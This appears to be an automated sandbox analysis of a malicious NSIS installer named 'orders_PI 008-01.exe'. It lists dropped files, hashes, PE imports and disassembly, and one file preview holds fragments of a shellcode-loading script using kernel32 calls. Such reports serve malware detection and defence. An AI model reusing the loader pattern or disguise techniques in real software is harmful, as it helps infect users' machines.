                                      SHA-512:B200C60C6A535D686374778AFFAB641F63234ADDD8BD4C29C867721AB75D5DC6B8AF69F632DAC3BEC310DA00EB3E0F69B3C07CB8674ABEAB047A484F62EA6A48
                                      Malicious:false
                                      Reputation:low
                                      Preview:{. "geoplugin_request":"173.254.250.69",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                      C:\Users\user\AppData\Local\Temp\bhv2901.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x236a0710, page size 32768, DirtyShutdown, Windows version 10.0
                                      Category:dropped
                                      Size (bytes):15728640
                                      Entropy (8bit):0.9442062962858436
                                      Encrypted:false
                                      SSDEEP:12288:IcCS8rMTkTaTeUZT+T5SFnTKXpmlGVvK:IcrTGv
                                      MD5:711A66C3EC930BC3725BB37E819E1CD0
                                      SHA1:604EFA4144EB02B6A185A6A6A8F0F1F6510EFC84
                                      SHA-256:03E3854ABA10D9B0898D2DC88702A963F60DE4207FC1B4004CFF83CA54051AD1
                                      SHA-512:E19F0B75CB026C83B199C0EAB729B1FFCE2A4FEC3774C7A352A8E6C89AC5CFB15A35975CBE69C76FEE3C75D542E7A2A8C79BFC7495F9CF2016B547DDB016FA29
                                      Malicious:false
                                      Reputation:low
                                      Preview:#j..... .......!........v.......{......................d........$...{.......|!.h...........................0s......{..............................................................................................Y...........eJ......n........................................................................................................... ........"...{..............................................................................................................................................................................................;....{...........................................|!.................Qd.+.....|!..........................#......h.......................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dll

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):12288
                                      Entropy (8bit):5.737556724687435
                                      Encrypted:false
                                      SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                      MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                      SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                      SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                      SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: RemotePCViewer.exe, Detection: malicious, Browse
                                      • Filename: 8737738_19082024.vbs, Detection: malicious, Browse
                                      • Filename: 8737738_19082024.vbs, Detection: malicious, Browse
                                      • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse
                                      • Filename: Dhl Delivery(AWB 9849791014).exe, Detection: malicious, Browse
                                      • Filename: 89.hta, Detection: malicious, Browse
                                      • Filename: sahost.exe, Detection: malicious, Browse
                                      • Filename: HSBC Advice_ACH_Credit_08082024 (1).xls, Detection: malicious, Browse
                                      • Filename: sahost.exe, Detection: malicious, Browse
                                      • Filename: sahost.exe, Detection: malicious, Browse
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\zwewot

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:..

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Foreningsprocessens\etisk.hvs

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:DIY-Thermocam raw data (Lepton 2.x), scale 175-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8.000000
                                      Category:dropped
                                      Size (bytes):385914
                                      Entropy (8bit):1.2561626561864936
                                      Encrypted:false
                                      SSDEEP:768:++TtgE2yMxqLKoiyt4CpVdIwu3Uema6LhlEv9cCAXP69rBqGDpx/NEJKTPLqqQJl:bMFgNCAE6oLJS9a/IrOyTWq2uC
                                      MD5:A4946227DE4DC2A79BF473A3D09C4247
                                      SHA1:9FF800E6B4A72B6281D812710D00AD003F757170
                                      SHA-256:1F6BB50C9AC95A61782FCDE006B6E396ACEDA7794FD30FFB7D97020FD7B8059E
                                      SHA-512:2902630584092375E1A2FB4669437C43548BC0D0E00B2B98A3FDAEEDC57F3567B61A3FC545C8157FD410D6E26C9A70E8D989E97983700FFB55D9D1154CEBE1F4
                                      Malicious:false
                                      Reputation:low
                                      Preview:..................................................#..................................._............................{.........................P................$.............................................................................................}............&................g.........................................A................................................K................................................Z..............-......5.........................................................e.......d..........................................L...............0......C................).................................................................................r............Q..2........................9................(...............................................t......................................................................>.....b..8.....................n.............]..................F.....................................U...................................S.........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Foreningsprocessens\leakers.txt

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):589
                                      Entropy (8bit):4.277818373535095
                                      Encrypted:false
                                      SSDEEP:12:mScXAtJsdW8lLQIVVCTP1t0laiam6mObo/Bpqwnh2yKbdB1j1f:mSrTsdRTVVM9Yz69Hwh2yKb7ff
                                      MD5:E80E34F461528DF8F86C4248C971B2AD
                                      SHA1:A1A74D8F5711DEED35AF2B81BE070CA471C39500
                                      SHA-256:F2552D843F4D62F481743A15B7C95AA322C14EA5DBB999C8C889A42CBB093A8E
                                      SHA-512:46A5D6487131677DAC16C2BE4FC29517C14CB8DB6228B40344D733597462122EF0D1D7DD69B4D5A7A10F9C86635F99D91E91AC2CEBDF923C6B72EF3809637622
                                      Malicious:false
                                      Reputation:low
                                      Preview:pervalvar udvalgsarbejderne illegitime besully.trvarefabrikkers stemmeslugers binomialfordelingernes metropolit.mariolatrous griffy fiskeeksporten valutapuklerne spekulanter infusioners quantifys unconsolidation digitalises forvaltningsret..steticismens advents syde rebaptization returneredes chemosterilants agtvrdige,balklines sludres drengestregers topful koordinatvrdien angorakats tendensromanens blockheadish lidelsesfller eskapismes amiably phenicious nontenurial..overspringe udmntede agnostiker polycarpic stolper lbskes forhandlingsomraader acquires duskly kildnes gaultherase..

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Foreningsprocessens\persongalleriers.una

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):276701
                                      Entropy (8bit):1.2570216910370695
                                      Encrypted:false
                                      SSDEEP:768:yFPJSwGwS4JXi8PNDQNMDeMW3SGBqGHw1zwpmPMoaO64g1abi4IZxeMcdN9vfd95:/rFf4EoTti54LkFvI3oDW
                                      MD5:18C3DA2AA022FF0B89999E28E6A2AE9A
                                      SHA1:0659DDE0FD4B39B22825F1645A0BAE7E7202C7F9
                                      SHA-256:05DE1FF63CC38C7C4B3034091A311791BFF578658FF17D156AA4FB41A2E197C6
                                      SHA-512:D3A51D8B29FEF026F94B339087413319E03DA3193D9159A43AD7B4FEE35A67EEEBC3E66A0092B5ED14F57458173D518C618F2EE00F4203F428EBE0FC162F667C
                                      Malicious:false
                                      Preview:......................................................(.L.................................3........&.................."...........l........................s.....................................-...........................8..........@.........................................................h..................................@.........).........................I.................F..................................................................T..............................................................j..".......#I.............r.............&..................|...............................................................................:.Z......................).............................................................................H.......C...........................................................................................t.........................................................M.............4........'........................................}..+.......................

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Foreningsprocessens\porkiest.mis

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):313672
                                      Entropy (8bit):1.2567166720965932
                                      Encrypted:false
                                      SSDEEP:768:iEGLlMkjkYtwS3MeXM3OpckON5VIbjnI3Oif4NxZSqJbDvz+hE7IkHAYsaW3DQLF:LtWLdp3I3yrt+3SoTMU5oT5
                                      MD5:17B0342D31B6E728E13DF79009833371
                                      SHA1:B9F3354C4E886382D220D5EC4FA91F389585BD40
                                      SHA-256:8CAF84CE635BD92186709E81D12AE352E049C83B53F1C22A6DCB221E8F1C011E
                                      SHA-512:4772F5AE64E0619B23114A41785DDE7DD1A9BACE12A9ABEDEF3400EDB3660D4E780C9B91E23A9FDEC1D97BCF7DC48E201771D7D58EB1740191A05CCFDB433C83
                                      Malicious:false
                                      Preview:....................N............................k....................................................#.................................................................................`........0.............u...................................y................................................................g.........7................E.......&........w..............................................*....................<..................................3................i.......................................................................U...).................................................. ........................................................................................................................A..............................N......c.b.......................................................................................................N........T..............................................h..............................................................................

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Gnavpotternes.The

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):9437
                                      Entropy (8bit):4.480159772832071
                                      Encrypted:false
                                      SSDEEP:192:Jxy5BzknZQeAE9zL/NR2CNzUWG9//5Uc5:anzkZ9z3/NA0KX5Uc5
                                      MD5:06E8FED876003B3AC855C94B4E0BE59D
                                      SHA1:85BD886154F33D5F67BE64A865B03BC3D04CD70F
                                      SHA-256:169E6EA357FC6DBD10E530FCFCFA50386BA75247273597CD43A63F9951899535
                                      SHA-512:455354FAB278D537404C17AD8E97ED9C29CAEB5FFB21B1588254D2FCE6C5EE58B17751463991D3E1116DD89CAC6B2753269100A34371442793054A14FACBADCA
                                      Malicious:false
                                      Preview:........*.....EEE........).WW............oooo.RR.@@..............A..y.V......o.............S..ak...e...r...n...e...l.443..x2...:...:...C...r...e...a..mt..7e...F..^i...l...e.P.A...(...m... ..vr...4... ...,... ...i... ...0...x...8...0.'.0...0...0...0..70..w0...,... ...i.0. ...0..X,... ...p... ...0..r,... ..Ki... .aa4...,... ...i... .G.0...x...8...0...,... ...i.h. .*.0.77)...i.~.....r...8.....!.k..Le...r...n...e...l.&&3...2...:...:..<S...e.B.t...F...i...l...e...P...o...i...n...t...e...r...(...i... ...r...8...,... ...i... ...2...3...0...1...2... ...,... ...i... ...0...,...i..S ...0...)...i..8....r...4.......k...e...r...n...e...l...3...2.3.:...:...V...i...r...t..Ru...a...l...A.|.l...l...o...c...(...i... ...0...,...i... ...2...7...6...5...2...0..\9...6.kk,... ...i... ..h0...x...3...0...0...0...,... ...i... ../0...x...4.i.0...)...p.......r...2.......k...e...r...n...e...l...3...2...:.11:...R...e...a.y.d...F...i...l...e...(..Bi... ...r...8.ll,... ..fi.?? ...r.?.2...,... ...i... ...2..#7...6...5

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Maleriet213.arc

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):244482
                                      Entropy (8bit):1.2509108197987615
                                      Encrypted:false
                                      SSDEEP:768:ArczTS8oocp0tWLSMkXWg7PKU30gfL4Qf1AUdyM03I3xkjFlu7NDSAZd+6XYIHXd:7Yhp0ckXv78owAC3MhxqI
                                      MD5:E6AC7A31DA2D4322339135AD20EB0F23
                                      SHA1:F76C6D6EE7C9B01DB799642990AA88B140003EC4
                                      SHA-256:00FAD7EC11DB9706955FDF3BE0E6FB037E9F9780F94A502A774B30AB52773A94
                                      SHA-512:C87DABB08D092D546FF80270B052CF1C5D92D25852DBFECC139CE528CCD2A22CCE130A8C90C08117DF542E6D83DE91E92180F853C201F042BED4681D4737E75D
                                      Malicious:false
                                      Preview:............................................w.........................................................................\.............................o.............q......................................]..........................I...............!...............................................m....... ............................................................................................h......K................=............................................................r..................................W....................................................................R......................................p..0...........................................................k.........k........................d........................................................................................................................9....................................#.....A........`...9...............P.......................................................................\...............

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Sprogforskningen.Ins

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):198289
                                      Entropy (8bit):7.344208044493616
                                      Encrypted:false
                                      SSDEEP:6144:EAaO357P3ehcQVXJrF7TH7JOJFeB4dG2UIpRZ:vaOp7PO6QR7THN8w4dUsZ
                                      MD5:6A35648F77E6363BCE0DE47D934AB494
                                      SHA1:33CF7D82F5819CA739D5E2A784FB975B0BF16A99
                                      SHA-256:9D3B9B1C5C1B26412F53F4FA81542C8B9DFDE8F8C02E4CFDE656852CE03D60BC
                                      SHA-512:E362A84A1C2A7BB553B2D89277D2C2B60449D56DE0D328E0A7C6DDD6BC2B0B94028AAECBAA84F993FFBE50F98E2B6D219E1E298C7D867022AFF10DE8FDFB01C2
                                      Malicious:false
                                      Preview:...........................5.%%....AAAAAA._...iiiii..........................v....,.D..................................(((.........II.................55......D...8.7.BBB............................-.g......................m.............................wwww.......^...XXX...................._.........Q.YYYYY......u..N...........::......../.&....................AAA..............ZZZZZZ.}}..y..tttttt...FF.III.........D...............................$..V................................e...QQQQQQ. ...C......V..........111111...............CCC..g..............................................M.H..............!..%..*.````......R......L.>>.333......{{...............................z....5...JJJJJJ.............7....666..>..<<........8......?..............EE...p............?...........D.....YY................................Y.kkk.....---......................).<<..........<<<<<...............pp...............33.?...................<<<.....................9...................j...........<<.........NN

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\afsgning.for

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):430713
                                      Entropy (8bit):1.2530301266200883
                                      Encrypted:false
                                      SSDEEP:1536:vu65sFtuGbUq4CCWG9TcLs9xEEc0MVWFnhMA:2PjbUquWUYs/9x
                                      MD5:8ED0D91C7C65B02A5630D1A012895C3D
                                      SHA1:FA74C3BD3A32123D71AEA67D386B5AC251FEC260
                                      SHA-256:1113E4990BEF55E4CD1D868513B2305C72803FB296D559BFA9C8C93DE2EDC8AB
                                      SHA-512:FBE41906CCABB44E8D71D7664B756F75ABDBF0FB80BFCBBF4BBA9D9370DF4CEDBE437BA9F116B3F9E9D2AE2FB1E2D34D34F152E518A2E5E0096A506093F8DB24
                                      Malicious:false
                                      Preview:..[.Z.....?............#......................................................0.....B..x....................................................Q.......Z......................I....j............{..........................................................................................................................................-.....7..............................M........9.U...........?...............................................................X..................../.....................t...............4................,........`........~..............d............................u............{.....................a.............................5.............{...g....Z.................H................l..........................S.............................................................................................................................J...........................................U............................x.....f.............D..../....o........................QLi...

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\bookishly.egg

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):223405
                                      Entropy (8bit):1.2642457624863013
                                      Encrypted:false
                                      SSDEEP:768:DDh04DrooyUGbNSipoS0yYEt0ihBLBJU06zf8VWZt+il3sVxTD6I6o9+2u5inuB4:rorpFGQVWwj9bQdun2ljrAbUGl
                                      MD5:96E6C0CBBACF232110DF3E7FC4B4D980
                                      SHA1:FC18FDD4E5417AC76F68BF507AC0BA6B9A183CFE
                                      SHA-256:04F64748055424253509A229EE3E6F9BFC86898CBA667DA8312333552987B610
                                      SHA-512:8DD22ABBED1522A08E9AC3559F5CC6871B77C1B76C2A7AA0CD61E52CA7D3A43DCBAF00285BF29C1FF885FC5F424FA411F56F19EB1886DA97CC7010BCA66530A9
                                      Malicious:false
                                      Preview:....................................{............!.............Q.............................................................................:...........z..................................W.......................... ......................................3...........y...............j................!n...............................................................................3........................+.......................a.......................c........................................)............................................................................................................................?.............................................................................................S....../.....................................................6./...t..+.......................H............{..........&................................b............................R.......x....=..................V....]........>...................................m................0.....

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):6.444410684161442
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:orders_PI 008-01.exe
                                      File size:906'904 bytes
                                      MD5:5009d8c72623d30ce09149187c66d37c
                                      SHA1:5c6035f099f16ff4753198e5f631ba410e98227f
                                      SHA256:e38bdd8374c7e1640e8fe34c531228dd9389affb9659cb7c49c00129baa73bdf
                                      SHA512:5908f38589b4097fd96f35129bbfa344a7940193ef0df6dab4e514106e7054c8ea9b3e97f9ebb7ff36fdbbd7c724cd1500e37f6c1ea6013f51842d39a642b5c1
                                      SSDEEP:12288:i3nIF6bq58AFe0TenvBdHdpUXjwxipfpQGYAGau5yxX9O9R:i3IFsmez5pdpUXjUiNuGYpawA9uR
                                      TLSH:18155849A38C90C6DD3A3B32F91D3613B655AC138950148A7AC8BE583BF57B07B5FA31
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....

                                      File Icon

                                      Icon Hash:d3672eac1a0c662c

                                      Static PE Info

                                      General

                                      Entrypoint:0x4034a2
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                      Authenticode Signature

                                      Signature Valid:false
                                      Signature Issuer:CN=Stallet, O=Stallet, L=Bilsington, C=GB
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 09/03/2024 12:26:01 09/03/2027 12:26:01
                                      Subject Chain
                                      • CN=Stallet, O=Stallet, L=Bilsington, C=GB
                                      Version:3
                                      Thumbprint MD5:EED03D11CC78DE80615CA26E748BF14D
                                      Thumbprint SHA-1:D32B85EE6B03EB76C4147DC3157B7646C80642BC
                                      Thumbprint SHA-256:53E1F408FA3313ACA407BFC66C0B75EE48D206776EED525E88E317F259285D7A
                                      Serial:688D5266029D3612D4D2D8869846237BA286D84B

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+14h], ebx
                                      mov dword ptr [esp+10h], 0040A2E0h
                                      mov dword ptr [esp+1Ch], ebx
                                      call dword ptr [004080CCh]
                                      call dword ptr [004080D0h]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [007A8A6Ch], eax
                                      je 00007F488CBAAB53h
                                      push ebx
                                      call 00007F488CBADE41h
                                      cmp eax, ebx
                                      je 00007F488CBAAB49h
                                      push 00000C00h
                                      call eax
                                      mov esi, 004082B0h
                                      push esi
                                      call 00007F488CBADDBBh
                                      push esi
                                      call dword ptr [00408154h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], 00000000h
                                      jne 00007F488CBAAB2Ch
                                      push 0000000Bh
                                      call 00007F488CBADE14h
                                      push 00000009h
                                      call 00007F488CBADE0Dh
                                      push 00000007h
                                      mov dword ptr [007A8A64h], eax
                                      call 00007F488CBADE01h
                                      cmp eax, ebx
                                      je 00007F488CBAAB51h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007F488CBAAB49h
                                      or byte ptr [007A8A6Fh], 00000040h
                                      push ebp
                                      call dword ptr [00408038h]
                                      push ebx
                                      call dword ptr [00408298h]
                                      mov dword ptr [007A8B38h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+34h]
                                      push 000002B4h
                                      push eax
                                      push ebx
                                      push 0079FF08h
                                      call dword ptr [0040818Ch]
                                      push 0040A2C8h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3de0000x56ef8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xdcda00x8f8.data
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x656c0x660012117ad2476c7a7912407af0dcfcb8a7False0.6737515318627451data6.47208759712619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x39eb780x6002020ca26e010546720fd467c5d087b57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x3a90000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x3de0000x56ef80x57000c1896e67b80e50079ebeadcac8c0d8c3False0.13646338451867815data2.5203155069997596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x3de2c80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.11415584223451786
                                      RT_ICON0x4202f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.17530758310658937
                                      RT_ICON0x430b180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.27551867219917014
                                      RT_ICON0x4330c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3295028142589118
                                      RT_ICON0x4341680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.47074468085106386
                                      RT_DIALOG0x4345d00x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x4346d00x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x4347f00xc4dataEnglishUnited States0.5918367346938775
                                      RT_DIALOG0x4348b80x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x4349180x4cdataEnglishUnited States0.7894736842105263
                                      RT_VERSION0x4349680x250dataEnglishUnited States0.5287162162162162
                                      RT_MANIFEST0x434bb80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                      Imports

                                      DLLImport
                                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
